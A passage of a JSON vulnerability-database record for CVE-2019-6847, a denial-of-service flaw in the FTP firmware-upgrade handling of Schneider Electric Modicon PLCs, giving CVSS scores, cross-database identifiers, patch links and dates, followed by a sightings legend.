"MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitabilityScore": 1.2, "id": "CVE-2019-6847", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 4.9, "baseSeverity": "Medium", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2019-6847", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "High", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2019-6847", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2019-6847", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2019-41494", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201910-395", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "fdfc7aaf-7b5b-40b9-9299-e58b8cb8fa2a", "trust": 0.2, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "fdfc7aaf-7b5b-40b9-9299-e58b8cb8fa2a" }, { "db": "CNVD", "id": "CNVD-2019-41494" }, { "db": "JVNDB", "id": "JVNDB-2019-011436" }, { "db": "CNNVD", "id": "CNNVD-201910-395" }, { "db": "NVD", "id": "CVE-2019-6847" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "A CWE-755: Improper Handling of Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon BMxCRA and 140CRA modules (all firmware versions), which could cause a Denial of Service attack on the FTP service when upgrading the firmware with a version incompatible with the application in the controller using FTP protocol. plural Modicon The product contains an exceptional condition handling vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The Modicon M580/M340/BMxCRA/140CRA are programmable logic controllers from Schneider Electric. \n\nA denial of service vulnerability exists in the Schneider Electric Modicon M580/M340/BMxCRA/140CRA", "sources": [ { "db": "NVD", "id": "CVE-2019-6847" }, { "db": "JVNDB", "id": "JVNDB-2019-011436" }, { "db": "CNVD", "id": "CNVD-2019-41494" }, { "db": "IVD", "id": "fdfc7aaf-7b5b-40b9-9299-e58b8cb8fa2a" } ], "trust": 2.34 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2019-6847", "trust": 3.2 }, { "db": "SCHNEIDER", "id": "SEVD-2019-281-02", "trust": 1.6 }, { "db": "CNVD", "id": "CNVD-2019-41494", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201910-395", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-011436", "trust": 0.8 }, { "db": "TALOS", "id": "TALOS-2019-0847", "trust": 0.6 }, { "db": "IVD", "id": "FDFC7AAF-7B5B-40B9-9299-E58B8CB8FA2A", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "fdfc7aaf-7b5b-40b9-9299-e58b8cb8fa2a" }, { "db": "CNVD", "id": "CNVD-2019-41494" }, { "db": "JVNDB", "id": "JVNDB-2019-011436" }, { "db": "CNNVD", "id": "CNNVD-201910-395" }, { "db": "NVD", "id": "CVE-2019-6847" } ] }, "id": "VAR-201910-0580", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "fdfc7aaf-7b5b-40b9-9299-e58b8cb8fa2a" }, { "db": "CNVD", "id": "CNVD-2019-41494" } ], "trust": 1.7978355000000001 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "IoT", "ICS" ], "sub_category": null, "trust": 0.6 }, { "category": [ "ICS" ], "sub_category": null, "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "fdfc7aaf-7b5b-40b9-9299-e58b8cb8fa2a" }, { "db": "CNVD", "id": "CNVD-2019-41494" } ] }, "last_update_date": "2024-11-23T21:36:37.604000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "SEVD-2019-281-02", "trust": 0.8, "url": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-281-02" }, { "title": "Patch for Schneider Electric Modicon M580/M340/BMxCRA/140CRA Denial of Service Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/190779" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-41494" }, { "db": "JVNDB", "id": "JVNDB-2019-011436" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-755", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-011436" }, { "db": "NVD", "id": "CVE-2019-6847" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-6847" }, { "trust": 1.6, "url": "https://www.se.com/ww/en/download/document/sevd-2019-281-02/" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-6847" }, { "trust": 0.6, "url": "https://www.schneider-electric.com/ww/en/download/document/sevd-2019-281-02" }, { "trust": 0.6, "url": "https://www.talosintelligence.com/vulnerability_reports/talos-2019-0847" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-41494" }, { "db": "JVNDB", "id": "JVNDB-2019-011436" }, { "db": "CNNVD", "id": "CNNVD-201910-395" }, { "db": "NVD", "id": "CVE-2019-6847" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "fdfc7aaf-7b5b-40b9-9299-e58b8cb8fa2a" }, { "db": "CNVD", "id": "CNVD-2019-41494" }, { "db": "JVNDB", "id": "JVNDB-2019-011436" }, { "db": "CNNVD", "id": "CNNVD-201910-395" }, { "db": "NVD", "id": "CVE-2019-6847" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-11-20T00:00:00", "db": "IVD", "id": "fdfc7aaf-7b5b-40b9-9299-e58b8cb8fa2a" }, { "date": "2019-11-19T00:00:00", "db": "CNVD", "id": "CNVD-2019-41494" }, { "date": "2019-11-07T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-011436" }, { "date": "2019-10-08T00:00:00", "db": "CNNVD", "id": "CNNVD-201910-395" }, { "date": "2019-10-29T19:15:22.267000", "db": "NVD", "id": "CVE-2019-6847" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-11-20T00:00:00", "db": "CNVD", "id": "CNVD-2019-41494" }, { "date": "2019-11-07T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-011436" }, { "date": "2021-04-20T00:00:00", "db": "CNNVD", "id": "CNNVD-201910-395" }, { "date": "2024-11-21T04:47:16.320000", "db": "NVD", "id": "CVE-2019-6847" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201910-395" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Schneider Electric Modicon M580/M340/BMxCRA/140CRA Denial of service vulnerability", "sources": [ { "db": "IVD", "id": "fdfc7aaf-7b5b-40b9-9299-e58b8cb8fa2a" }, { "db": "CNVD", "id": "CNVD-2019-41494" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "other", "sources": [ { "db": "IVD", "id": "fdfc7aaf-7b5b-40b9-9299-e58b8cb8fa2a" }, { "db": "CNNVD", "id": "CNNVD-201910-395" } ], "trust": 0.8 } }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.